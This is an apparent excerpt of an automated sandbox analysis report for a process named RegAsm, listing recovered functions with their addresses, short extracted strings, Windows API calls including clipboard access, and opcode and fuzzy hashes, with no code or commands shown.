Opcode Fuzzy Hash: ebd350a806b6267d54850dcc7634231ec96fc33bb10cae1b160b277ce83be72e
Instruction Fuzzy Hash: F021797560D340AFC304CF25E5A162FBBF1ABDA601F64882DE4C957381C634DA06CB5B

Function 004358F0 Relevance: 2.8, Strings: 2, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

wq, xrefs: 00435EFC
@, xrefs: 00435FDD

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: @$wq
API String ID: 0-4113691029
Opcode ID: 382f5bc31001be75b39dd734d104d68c751c36c66b7faad8aa9868fcf780823e
Instruction ID: 0c906ebc65f380bf470a555f5154013bd3eaf3e537455d20ef1bd230b860c2cd
Opcode Fuzzy Hash: 382f5bc31001be75b39dd734d104d68c751c36c66b7faad8aa9868fcf780823e
Instruction Fuzzy Hash: 3CA163B4108341ABC304CF18D59162BB7F1FF8A749F50992EF4C99B261E338D901DB4A

Function 00435C11 Relevance: 2.6, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4`[b, xrefs: 00435CB0
4`[b, xrefs: 00435C10

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: 4`[b$4`[b
API String ID: 2994545307-3640500014
Opcode ID: fad40bbdfd25b68f54aed223f91cc9fbae25ba9bab07484ea3621333f03fe624
Instruction ID: c1bd9dd9ae5a31842157fe631375f338841f43209ed37e43ea1e5e215c8b9a87
Opcode Fuzzy Hash: fad40bbdfd25b68f54aed223f91cc9fbae25ba9bab07484ea3621333f03fe624
Instruction Fuzzy Hash: 9921A435208701EBD729DF04D4A0A3FB3A2FF9A709F94AA1ED58217355C3399851CB9E

Function 004358B0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00437B8F,005C003F,00000006,?,?,00000018,700F0E0D,?,?), ref: 004358DE

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 00433960 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 004339CD

Strings

`123, xrefs: 004339C0, 00433996

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID: `123
API String ID: 3298025750-1835766495
Opcode ID: 62002a7d3e0658357d5e006fef020dde4b90f8a974b23afd1862a5025c141389
Instruction ID: 6ec2f0a5b2c956332e150181788087568aae935c8c55b0e5a7a8aa430f7a3b90
Opcode Fuzzy Hash: 62002a7d3e0658357d5e006fef020dde4b90f8a974b23afd1862a5025c141389
Instruction Fuzzy Hash: A8014F7420C241CBD318EF18D561B2EFBE1EF85705F54892CD5CA47791C7359864CB46

Function 004338E0 Relevance: 1.5, APIs: 1, Instructions: 44
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0043394F

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2665456c9de08df5721046b6f0c98ae93c38ef158d7d8ce0b713934606d97a5c
Instruction ID: b13666b2c59fc3d376935adbc0db412a6a92a92454552c9f2ff8b7d0694dfcb5
Opcode Fuzzy Hash: 2665456c9de08df5721046b6f0c98ae93c38ef158d7d8ce0b713934606d97a5c
Instruction Fuzzy Hash: 7DF0BDB4208280AFD305EF18C990B1ABBE1EB99701F548D5CE4D487362C27AE825CB5A

Non-executed Functions

Function 004245D0 Relevance: 26.0, APIs: 2, Strings: 11, Instructions: 3294COMMON

Download Yara Rule

Strings

nLv', xrefs: 004245F0
--',, xrefs: 00426FC5
IMB9, xrefs: 004247E6
m[h], xrefs: 00425565
5:2?, xrefs: 00426FB0
{FG{, xrefs: 00424F28
$r!, xrefs: 00426980
UT_8, xrefs: 004247D2
,\Ry, xrefs: 00425343
f@~T, xrefs: 00426976
!2)', xrefs: 00426FBE

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $r!$!2)'$,\Ry$--',$5:2?$IMB9$UT_8$f@~T$m[h]$nLv'${FG{
API String ID: 0-2498188146
Opcode ID: 16058d4af700f765c8c6f82807d740a2c0b7fe626f3ee33c788c2d8152ec63c3
Instruction ID: 8b58e684f7e0e0186c5c63939ae6b41da82ad5973140cf0599c38befe8799fd9
Opcode Fuzzy Hash: 16058d4af700f765c8c6f82807d740a2c0b7fe626f3ee33c788c2d8152ec63c3
Instruction Fuzzy Hash: 2243D070204B928BD325CF39D1947A3FBE2AF52304F58896EC4EB4B792C779A445CB58

Function 0040A250 Relevance: 11.6, Strings: 9, Instructions: 391COMMON

Download Yara Rule

Strings

sm, xrefs: 0040A6A3
TB]U, xrefs: 0040A346
{u, xrefs: 0040A68D
dg, xrefs: 0040A6C4
Qlgf, xrefs: 0040A45A
(, xrefs: 0040A527
wq, xrefs: 0040A698
aTmP, xrefs: 0040A452
0, xrefs: 0040A2A4

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ($0$Qlgf$TB]U$aTmP$dg$sm$wq${u
API String ID: 0-3713301332
Opcode ID: 8fbe1d29347ef24581e0ebfb0a7c1454b2b7d4e1cae502f35c6f1e08814cc552
Instruction ID: 0fee8b461fb77af47e0f40fedb3bff6b147af60b01c0481e2aa57128188a342d
Opcode Fuzzy Hash: 8fbe1d29347ef24581e0ebfb0a7c1454b2b7d4e1cae502f35c6f1e08814cc552
Instruction Fuzzy Hash: 72E133B020C3809BD314DF19C490A2FBBE1EF96718F148A2DE5D99B392C7399915CB5B

Function 00414967 Relevance: 11.5, Strings: 8, Instructions: 1469COMMON

Download Yara Rule

Strings

S2Q_], xrefs: 00414A9F
D D, xrefs: 0041561E
'#?, xrefs: 00415569
_], xrefs: 00414A12
/,3&, xrefs: 00415585
S2Q_], xrefs: 004149FE
"54, xrefs: 0041555B
'$#<, xrefs: 00415562

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: '$#<$/,3&$D D$"54$'#?$S2Q_]$S2Q_]$_]
API String ID: 0-350254822
Opcode ID: 9fc90c7ae9629e37039838e83542b11fad433be623311c3f9cfb602516df1763
Instruction ID: e09261184a5b9957d17bb30db2595d5947a8f109d62d43c00a67e421f01136d6
Opcode Fuzzy Hash: 9fc90c7ae9629e37039838e83542b11fad433be623311c3f9cfb602516df1763
Instruction Fuzzy Hash: BAA2DEB0904219CFDB14CF54C8916EFBBB2FF86314F18855DD4966B382C739A986CB98

Function 0041AA80 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 475COMMON

Download Yara Rule

Strings

{q, xrefs: 0041AF40
qu, xrefs: 0041AF38
WQ, xrefs: 0041AD7B
TU, xrefs: 0041B0D2

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: TU$WQ$qu${q
API String ID: 0-283785601
Opcode ID: c57760108ba52eff105da043fa4158ac0ad73176cd098a269709e4e794c4a609
Instruction ID: 4aba18db4194ba8a6928d0f7ea27ec875d8cd51b6fab7e66d1762f57d9f78f75
Opcode Fuzzy Hash: c57760108ba52eff105da043fa4158ac0ad73176cd098a269709e4e794c4a609
Instruction Fuzzy Hash: 4E0252B01093809BD314DF09D890A6BBBF1EF95748F144A2DE1D98B361D339D986CB9B

Function 0042AED0 Relevance: 9.1, APIs: 6, Instructions: 116clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0042AEF4
GetWindowLongW.USER32 ref: 0042AF21
GetClipboardData.USER32 ref: 0042AF31
GlobalLock.KERNEL32 ref: 0042AF4B
GlobalUnlock.KERNEL32 ref: 0042B02B
CloseClipboard.USER32 ref: 0042B033

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID:
API String ID: 2832541153-0
Opcode ID: e4fc1cfb410e398188d9cdd61d017191ab578a671e50b03f8011340b85fa8ab9
Instruction ID: b6a984cd688abb73c2aefde68673d6b489a3b97103906ed5501a92e29a96bcb5
Opcode Fuzzy Hash: e4fc1cfb410e398188d9cdd61d017191ab578a671e50b03f8011340b85fa8ab9
Instruction Fuzzy Hash: 4241C3B09087918FD711AB7CA44936FBFE0AB12314F448A2EE5E687382D7389445C7A7

Function 0041DF97 Relevance: 8.4, Strings: 6, Instructions: 893COMMON

Download Yara Rule

Strings

OI, xrefs: 0041EA6C
GA, xrefs: 0041EA58
4`[b, xrefs: 0041E920
+A, xrefs: 0041E6FB
LM, xrefs: 0041E647
lA, xrefs: 0041EB66

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: +A$4`[b$LM$lA$GA$OI
API String ID: 0-1930206426
Opcode ID: 955869d99b5e6ad8ca8db3f0419d15f5a497f0a2b7a47a64e182ae06aed49700
Instruction ID: fc17c15144d4ff5a32766275bb861d0920c222670baeb389480fa2216419961f
Opcode Fuzzy Hash: 955869d99b5e6ad8ca8db3f0419d15f5a497f0a2b7a47a64e182ae06aed49700
Instruction Fuzzy Hash: 28628DB9E0021ACBDB14CF65D8517EEBBB2FF49304F1844A9D845AB381D7389A81CF95

Function 004119EF Relevance: 7.2, Strings: 5, Instructions: 907COMMON

Download Yara Rule

Strings

@A, xrefs: 004127FA
4`[b, xrefs: 004121D0
YG, xrefs: 004127EA
$E,C, xrefs: 004127F2
tw, xrefs: 00411DF6

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: YG$$E,C$4`[b$@A$tw
API String ID: 0-4039293858
Opcode ID: 98ed2851579c1087240f8ef7b37dcb4bbeab6563ccde78041436513c5038016b
Instruction ID: cb0f5d18f79ac97dedbe74008a5da037511d8f5a0ef1f77b3bce2ff90b284a3a
Opcode Fuzzy Hash: 98ed2851579c1087240f8ef7b37dcb4bbeab6563ccde78041436513c5038016b
Instruction Fuzzy Hash: 805289706083419FC324DF14C590BABBBF1EF86794F14991DE5CA8B3A1D7789891CB4A

Function 0040E9AD Relevance: 6.9, Strings: 5, Instructions: 681COMMON

Download Yara Rule

Strings

dTUl, xrefs: 0040FA64
{q, xrefs: 0040F77E
6, xrefs: 0040F818
ugs%, xrefs: 0040FA7A
0, xrefs: 0040F633

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0$6$dTUl$ugs%${q
API String ID: 0-304012093
Opcode ID: 4976a6d2baece24130e1b0a3fcb55ad35979048744a9243212975826f559cb80
Instruction ID: 99eeb2df5c31e1a90e85cb19d4053094d62376da682691008a0c65975b1d07cf
Opcode Fuzzy Hash: 4976a6d2baece24130e1b0a3fcb55ad35979048744a9243212975826f559cb80
Instruction Fuzzy Hash: FB32B0B15083809FD725CF28D89076BBBE1AF96308F14487DE48997392D739D849CB9B

Function 004228D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00422923
GetSystemMetrics.USER32 ref: 00422932

Strings

, xrefs: 00422A06

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 4da66a750322a264b3ab46bce6a9bc0f7e9bbdb94c86139a9d82bac835fca592
Instruction ID: 1d26471e7ea84532a4efb49915bad08806d8bcb474f814dfe04d651a38b31342
Opcode Fuzzy Hash: 4da66a750322a264b3ab46bce6a9bc0f7e9bbdb94c86139a9d82bac835fca592
Instruction Fuzzy Hash: DD517FB0A152199FDB40EFACD98569EBBF0FB48314F10852DE898E7350E734A944CF96

Function 00437022 Relevance: 4.3, Strings: 3, Instructions: 542COMMON

Download Yara Rule

Strings

BrC, xrefs: 00437232
bpC, xrefs: 0043705B
RuC, xrefs: 00437547

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: BrC$RuC$bpC
API String ID: 0-3642957703
Opcode ID: 4968d85dbcf18465c32b06ccf56ca26348e8b8698d41734a233902f61c2cd173
Instruction ID: a4835479ec93e5188ea42a887852fc4a42eefb24cd75eba508af51fb8cb3e469
Opcode Fuzzy Hash: 4968d85dbcf18465c32b06ccf56ca26348e8b8698d41734a233902f61c2cd173
Instruction Fuzzy Hash: 5402E375A08205CFCB18CF58D8A06AEF7F2FF8A314F19956ED496A73A1C7349841CB45

Function 00414355 Relevance: 4.2, Strings: 3, Instructions: 467COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00414520
^h^Q, xrefs: 004143F9
GGK\, xrefs: 00414400

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$GGK\$^h^Q
API String ID: 0-2872912935
Opcode ID: 2169fb1dd032ff6d31ef46d6ec9589c3c3650eee3fb03ac4b1539980b16d536a
Instruction ID: 3cd8d1e1c41e603c5c93e155d01071762f76977a7e9a1aaae1e6aea02b9bcd80
Opcode Fuzzy Hash: 2169fb1dd032ff6d31ef46d6ec9589c3c3650eee3fb03ac4b1539980b16d536a
Instruction Fuzzy Hash: 6DF116B5D00215CBDB14CFA8D8916EEB7B2FF4A304F18456DD452AB382D339AD41CB98

Function 0041EBB1 Relevance: 2.6, Strings: 2, Instructions: 146COMMON

Download Yara Rule

Strings

Cv, xrefs: 0041ED0C
T_, xrefs: 0041ED1A

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: Cv$T_
API String ID: 0-3992343605
Opcode ID: 62964efafae275919db2a16468b5a1d5cfbce16f75e70a5a3d2c5c1138c2974a
Instruction ID: 662d89be9d82f12a7c629fde5f32865d19c63d9bb9ed09a829086dfe659df01c
Opcode Fuzzy Hash: 62964efafae275919db2a16468b5a1d5cfbce16f75e70a5a3d2c5c1138c2974a
Instruction Fuzzy Hash: 3C6189B4A0071A9FEB24CF51C9506AEFBB2FF85710F144A4DE4566B781C3B4A981CF98

Function 0041F871 Relevance: 2.6, Strings: 2, Instructions: 79COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0041F870
4`[b, xrefs: 0041F920

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: 4`[b$4`[b
API String ID: 2994545307-3640500014
Opcode ID: fd4a52381d1f65654b7c326e5fd9a73b784ddd7ad915ad5b03bf587c3378e191
Instruction ID: 7458254d1c59be6fc66bf96842a3cd610acc4fa8464edea4e9933930dc4074c6
Opcode Fuzzy Hash: fd4a52381d1f65654b7c326e5fd9a73b784ddd7ad915ad5b03bf587c3378e191
Instruction Fuzzy Hash: B421E0B4A10149EBDB28DB44C5A0BFEB3B2BF46301F60016AD54627390C3355E86CB6E

Function 0041A2B4 Relevance: 2.0, APIs: 1, Instructions: 510libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 0041A4AD

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 989eca102f7cee1ca030cf1e134ebe17117486215e058b3edd1d62260e430d0c
Instruction ID: 0a539fd7b251266ca6aeb8dc8b8ee2014617db8b68d271518bbd60855bad5fd1
Opcode Fuzzy Hash: 989eca102f7cee1ca030cf1e134ebe17117486215e058b3edd1d62260e430d0c
Instruction Fuzzy Hash: 8B029B75A01216CFDB08CF59D890BAEB3B2FF49310F298568E905A7390D735AD61CF68

Function 0040EB2D Relevance: 1.8, Strings: 1, Instructions: 525COMMON

Download Yara Rule

Strings

>, xrefs: 0040F2D8

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: >
API String ID: 0-325317158
Opcode ID: 21e798d485bf375d464408bda4bb4bf1a229f337095336c45334b0f106a161a7
Instruction ID: 8259facfa4d72e284d91e44029ac28be40981d3b50f811c059009e5c2d446c87
Opcode Fuzzy Hash: 21e798d485bf375d464408bda4bb4bf1a229f337095336c45334b0f106a161a7
Instruction Fuzzy Hash: 7602BD71908341DBD724DF24D98176BB7E5AF86308F04483EE489A7392E739D849CB9A

Function 00419500 Relevance: 1.8, APIs: 1, Instructions: 255comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0043A538,00000000,00000001,0043A528), ref: 00419529

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 8975e62399cac8334eafbf92e2918394e892a4130022934ad95aa8776b406e53
Instruction ID: d1a297c9532ef30ee32ee644c92162e9ddbbc6b30ee2ccc97f8cc1c569a6bae3
Opcode Fuzzy Hash: 8975e62399cac8334eafbf92e2918394e892a4130022934ad95aa8776b406e53
Instruction Fuzzy Hash: 5E61FEB1600204ABDB209F24CCA2BB733B5EF85358F044919F9868B391F779EC41C76A

Function 0041EDF3 Relevance: 1.7, Strings: 1, Instructions: 486COMMON

Download Yara Rule

Strings

bA, xrefs: 0041EF54

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: bA
API String ID: 0-897489536
Opcode ID: 7482d01b80df6bc40d2c3d65559efc85ad07b8089b2a168badabdf8f91073795
Instruction ID: d1a4f7eaeb0abb483051988efb707b536b0882f396cb056f032a19d0f0101742
Opcode Fuzzy Hash: 7482d01b80df6bc40d2c3d65559efc85ad07b8089b2a168badabdf8f91073795
Instruction Fuzzy Hash: 65F1FE35E01251DFDB14CF29E8507AEBBB2AF4A310F1982B9D815AB3D1C375AC41CB98

Function 00419780 Relevance: 1.7, Strings: 1, Instructions: 427COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00419BF0

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: a6454fe60b1f8fbe79a0665ae9c2a227c0d3f87dad3fba587709f477586f9611
Instruction ID: f1f4c6ded27af21085a7077a2c68dd94d0c008b5438ea4ae1cf2bfb0ea619a7e
Opcode Fuzzy Hash: a6454fe60b1f8fbe79a0665ae9c2a227c0d3f87dad3fba587709f477586f9611
Instruction Fuzzy Hash: DDC1D1715082409BD714EF18C8A1AABB7F1FF86754F08891DE4C98B391E339ED85CB5A

Function 00421730 Relevance: 1.7, Strings: 1, Instructions: 418COMMON

Download Yara Rule

Strings

", xrefs: 00421A49

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: ace919209808e28087dd56c5bb8a9fb0a304e64fdf8f4e17bd78e06e369fcd95
Instruction ID: 5697b36e252d9d00e4ca3e4cf2bc48c673d24501c58607141feab8f0aa369dab
Opcode Fuzzy Hash: ace919209808e28087dd56c5bb8a9fb0a304e64fdf8f4e17bd78e06e369fcd95
Instruction Fuzzy Hash: FFD139B2B083205BD714CE25E45176BB7E99FA4354F48892FE895873A1E73CEC44C786

Function 00419F16 Relevance: 1.7, Strings: 1, Instructions: 403COMMON

Download Yara Rule

Strings

D D, xrefs: 0041A0C2

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: D D
API String ID: 0-1827101989
Opcode ID: 18ddaa935979de2736b64a67e72136690b84d056c6e7221c9576ec7ef005b8e0
Instruction ID: da4f6fb28d59b79a8dec70ff80a6c54bf496e2f4386aa29748d673addeb69069
Opcode Fuzzy Hash: 18ddaa935979de2736b64a67e72136690b84d056c6e7221c9576ec7ef005b8e0
Instruction Fuzzy Hash: 9BD19B71A0122ACBDB14CF99D8907EEB7B1FF49310F248169D855AB390C734AD51CFA8

Function 0041FB8E Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0041FB30

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: 966a12e0b1ffdc072d74dac2709a01afc599ebe41c205e04b9bf999f95f25af6
Instruction ID: efecaee907f98ab50834ab5f9efed63d3d8e3e45473ad0917a5c339f6626d56b
Opcode Fuzzy Hash: 966a12e0b1ffdc072d74dac2709a01afc599ebe41c205e04b9bf999f95f25af6
Instruction Fuzzy Hash: 8651A8B4900219CFEB10CF55D855BAFBBB1BF09300F2500A9E5056B3A2C379AE41CFA9

Function 0041F942 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0041F920

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: 677fb2370ab64bd8b81499b6c0e5d05d593b3a615d93557008c7490987027133
Instruction ID: da3eea37be12eecfd639ede42aac42651ad1d2808f271e6f977b50812b37192f
Opcode Fuzzy Hash: 677fb2370ab64bd8b81499b6c0e5d05d593b3a615d93557008c7490987027133
Instruction Fuzzy Hash: 15312B74A102598BDB18CF54C6A07BFB7B2BF86301F2441A9C54A3B794C3745E46CB6A

Function 004119CB Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

D, xrefs: 00411990

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 7d8c4c917c3abe5dff92dcd396d84a39230e08a22d27918f18d52dd9b58031ab
Instruction ID: 9b5f4b658067e988bca34a5fbfec7578c51dc2a552032d173fce6399ca1d1002
Opcode Fuzzy Hash: 7d8c4c917c3abe5dff92dcd396d84a39230e08a22d27918f18d52dd9b58031ab
Instruction Fuzzy Hash: F03139B4409340AFE3208F51D9A971BFFF4BB92B49F10591CF2901A2A0D7FA9548CF96

Function 00435CCE Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00435CB0

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: 397826cc36939d5b4beb34d8c220faf3923c92838371b7659d65e96a208c5ce1
Instruction ID: 2faf8b5da95e9ecde47bc5cfd0c7ce2ef621df0d45c09ae17488a617048dacf1
Opcode Fuzzy Hash: 397826cc36939d5b4beb34d8c220faf3923c92838371b7659d65e96a208c5ce1
Instruction Fuzzy Hash: 9E21F33420C7408BD309DF09C1A0A2FF7E2EF8AB15F64AA1DD1C617355C339A8518B8A

Function 0041FAA8 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0041FB30

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: 6a296d5f2451af90d1960fe0239e3e71163005f617efc08d6a5686c1ee0d7fc2
Instruction ID: 9b66366bffb89bc80a59f85c1cffe6a5e35b9c10fc01e223207da8dfaad72b12
Opcode Fuzzy Hash: 6a296d5f2451af90d1960fe0239e3e71163005f617efc08d6a5686c1ee0d7fc2
Instruction Fuzzy Hash: 31111874A0515A8BDB18CF44C6607BFF7B1BF46301F2441A9C54A37791C3786E46CBAA

Function 004040A0 Relevance: .7, Instructions: 706COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86784ee34380de8fbd6f870b8f95d8097dbd33ae0e3efcec15dff9367ee68fce
Instruction ID: 810a9337eace68b3a4dce74fef11a80e61cef102f773645e9cb7fa266db222de
Opcode Fuzzy Hash: 86784ee34380de8fbd6f870b8f95d8097dbd33ae0e3efcec15dff9367ee68fce
